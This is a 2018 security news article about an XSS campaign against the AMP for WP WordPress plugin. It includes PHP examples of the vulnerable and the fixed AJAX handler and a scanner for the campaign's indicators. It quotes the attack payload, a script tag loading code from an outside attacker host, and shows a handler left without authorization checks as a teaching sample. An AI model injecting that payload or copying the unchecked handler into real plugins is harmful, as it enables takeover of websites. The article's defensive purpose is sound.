AMP for WP Plugin
News | 11/21/2018

Active XSS injection campaigns attack WP WordPress Plug-in



WordPress (WP) is by far the most popular open source content management system (CMS), used by approximately 75 million websites. The ease of deploying and upgrading this free tool makes it popular among web-savvy users and web novices alike. Whether it is a commercial site or a personal blog, the fact that WordPress doesn’t charge a penny makes it a preferred choice.

The flexibility of WordPress to host thousands of plugins and templates gives it an edge over its contemporaries. However, its popularity among users has also made it a lucrative target for threat actors.

Recent research reveals that a vulnerability in a high-profile WordPress plugin installed on more than 100,000 sites has come under active exploitation. The vulnerability, discovered in the popular AMP (Accelerated Mobile Pages) for WP plugin, allows any registered user to perform administrative actions on a WordPress site.

What is AMP for WP plugin?

A website may not behave the same way on mobile platforms. For instance, page load speed, layout and many other features may differ on mobile devices. This can have an impact on web traffic and affect the site’s search ranking as well.

AMP plugins for WordPress are designed to make a website usable from any mobile device, so that visitors get the full set of the website’s features when browsing on a mobile device.

Insights of XSS Injection Campaign

Older versions of the AMP for WP plugin contain security vulnerabilities that make it a lucrative target for cross-site scripting (XSS) attacks. An active XSS campaign exploits these vulnerabilities to create rogue admin accounts on vulnerable WordPress sites.

WordPress plugin development allows a plugin to register AJAX hooks. AJAX is a technique that lets a webpage update its content without reloading in the browser: data can be fetched from the database and displayed on the front end without a page refresh.

The main issue with this approach is that every registered user can call AJAX hooks. If the called hook does not perform an authorization check, any user can invoke those functions and inject the following XSS payload into vulnerable sites:

<script src=https://sslapis.com/assets/si/stat.js></script>
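The unsafe hook pattern the article describes, alongside the authorization check that the updated plugin added, as an added example written for this page (it is not the AMP for WP plugin's own code). The option key `example_amp_settings`, the AJAX action names and the nonce action `example_amp_nonce` are hypothetical; the WordPress functions are real.

```php
<?php
/**
 * Added example (not the AMP for WP plugin's own code): a plugin settings
 * endpoint exposed through admin-ajax.php, first in the unsafe form the
 * article describes, then with the checks that close the hole.
 * Hypothetical names: option "example_amp_settings", actions
 * "example_amp_save_settings*", nonce action "example_amp_nonce".
 */

// --- Vulnerable pattern -------------------------------------------------
// Every logged-in user, subscribers included, can reach a wp_ajax_* hook by
// POSTing to /wp-admin/admin-ajax.php?action=example_amp_save_settings_unsafe.
// With no capability check any user can overwrite the settings, and with no
// sanitisation a submitted <script> tag is stored and rendered later wherever
// the setting is echoed (here assumed to be an admin page).
function example_amp_save_settings_unsafe() {
    $settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    update_option( 'example_amp_settings', $settings ); // stored exactly as submitted
    wp_send_json_success( 'saved' );
}
add_action( 'wp_ajax_example_amp_save_settings_unsafe', 'example_amp_save_settings_unsafe' );

// --- Hardened pattern ---------------------------------------------------
function example_amp_save_settings() {
    // 1. CSRF protection: the request must carry a nonce issued to this user.
    //    check_ajax_referer() ends the request via wp_die() on failure.
    check_ajax_referer( 'example_amp_nonce', 'nonce' );

    // 2. Authorization: only users who may manage site options proceed.
    //    This is the check the article says the fixed plugin version adds.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input validation: accept only known keys and strip markup, so an
    //    injected <script> tag never reaches the options table.
    $raw      = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    $settings = array(
        'site_title'   => sanitize_text_field( $raw['site_title'] ?? '' ),
        'analytics_id' => preg_replace( '/[^A-Za-z0-9\-]/', '', $raw['analytics_id'] ?? '' ),
    );
    update_option( 'example_amp_settings', $settings );
    wp_send_json_success( $settings );
}
add_action( 'wp_ajax_example_amp_save_settings', 'example_amp_save_settings' );

// Defence in depth: escape on output too, so a bad value that somehow lands
// in the options table still cannot execute in an administrator's browser.
function example_amp_render_title() {
    $settings = get_option( 'example_amp_settings', array() );
    echo esc_html( $settings['site_title'] ?? '' );
}

// The nonce the hardened handler expects; hand it to the admin page's
// JavaScript (for example through wp_localize_script()) so legitimate
// requests can include it as the "nonce" POST field.
function example_amp_admin_nonce() {
    return wp_create_nonce( 'example_amp_nonce' );
}
```

The capability check is the fix the article attributes to the updated plugin; the nonce and the output escaping are the two companion controls a reviewer would expect on the same handler, because a missing nonce lets an attacker drive an administrator's browser into the endpoint, and unescaped output is what turns a stored value into the XSS the campaign relies on.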

 

When this malicious script executes in an administrator’s browser, it affects the website in the following ways:

  1. It simulates filling out the New User form to create a new rogue admin user on the site.
  2. The rogue admin account is configured with the username supportuuser and the email supportuser72019@gmail.com.
  3. Apart from creating a new rogue administrator account, the script also attempts to inject backdoor code into the affected site’s plugins.
  4. These backdoors enable attackers to execute arbitrary PHP code on infected sites and inject their ads, mining scripts or JavaScript malware.
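A defender-side check for the indicators the article lists (the script include, the rogue username and its e-mail address), added here as an example and not part of the original article. The records and user list it scans are constructed sample data; the function names are hypothetical.

```php
<?php
/**
 * Added example (not from the original article): scan text records (post
 * content, option values, plugin source) for the injected script include and
 * inspect a user list for the rogue administrator. $records and $users below
 * are constructed sample data, not output from a real site.
 */

// Indicators quoted in the article.
const IOC_SCRIPT_HOST = 'sslapis.com';
const IOC_SCRIPT_PATH = '/assets/si/stat.js';
const IOC_USERNAME    = 'supportuuser';
const IOC_EMAIL       = 'supportuser72019@gmail.com';

/**
 * Return the labels of records that embed the malicious script include.
 * Entity- and URL-encoded copies are decoded first, since stored post content
 * and serialized option values often carry the tag in encoded form.
 */
function find_injected_script( array $records ): array {
    $hits = array();
    foreach ( $records as $label => $text ) {
        $decoded = urldecode( html_entity_decode( $text, ENT_QUOTES | ENT_HTML5 ) );
        if ( stripos( $decoded, IOC_SCRIPT_HOST . IOC_SCRIPT_PATH ) !== false ) {
            $hits[] = $label;
        }
    }
    return $hits;
}

/** Return logins of administrators matching the rogue account's login or e-mail. */
function find_rogue_admins( array $users ): array {
    $hits = array();
    foreach ( $users as $u ) {
        $is_admin = in_array( 'administrator', $u['roles'], true );
        $matches  = strcasecmp( $u['user_login'], IOC_USERNAME ) === 0
                 || strcasecmp( $u['user_email'], IOC_EMAIL ) === 0;
        if ( $is_admin && $matches ) {
            $hits[] = $u['user_login'];
        }
    }
    return $hits;
}

// ---- constructed sample data ------------------------------------------
$records = array(
    'post:12'                => '<p>Welcome to the blog.</p>',
    'option:amp_custom_html' => '&lt;script src=https://sslapis.com/assets/si/stat.js&gt;&lt;/script&gt;',
    'plugin:amp/footer.php'  => 'echo "<script src=https://SSLAPIS.com/assets/si/stat.js></script>";',
);
$users = array(
    array( 'user_login' => 'alice',        'user_email' => 'alice@example.org',          'roles' => array( 'administrator' ) ),
    array( 'user_login' => 'supportuuser', 'user_email' => 'supportuser72019@gmail.com', 'roles' => array( 'administrator' ) ),
    array( 'user_login' => 'bob',          'user_email' => 'bob@example.org',            'roles' => array( 'subscriber' ) ),
);

foreach ( find_injected_script( $records ) as $label ) {
    echo "injected script in {$label}\n";
}
foreach ( find_rogue_admins( $users ) as $login ) {
    echo "rogue administrator: {$login}\n";
}
```

On a live site the same two lookups map to WP-CLI's `wp db search sslapis.com` and `wp user list --role=administrator --fields=ID,user_login,user_email`. Any hit means the site should be treated as compromised rather than merely vulnerable: updating the plugin closes the hole but does not remove the rogue account or the backdoor code dropped into other plugins, so those have to be removed and the plugin files compared against clean copies from wordpress.org (for example with `wp plugin verify-checksums --all`).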

 

In the updated version, the plugin performs an authorization check so that only admin users can update plugin settings.

Site owners using the AMP for WP plugin are therefore advised to update to the most recent version (0.9.97.20) as soon as possible.


Virus Removal Guidelines
Plot No 319, Nandpuri- B Pratap Nagar
Jaipur
Rajasthan 302033
Phone: +91 9799661866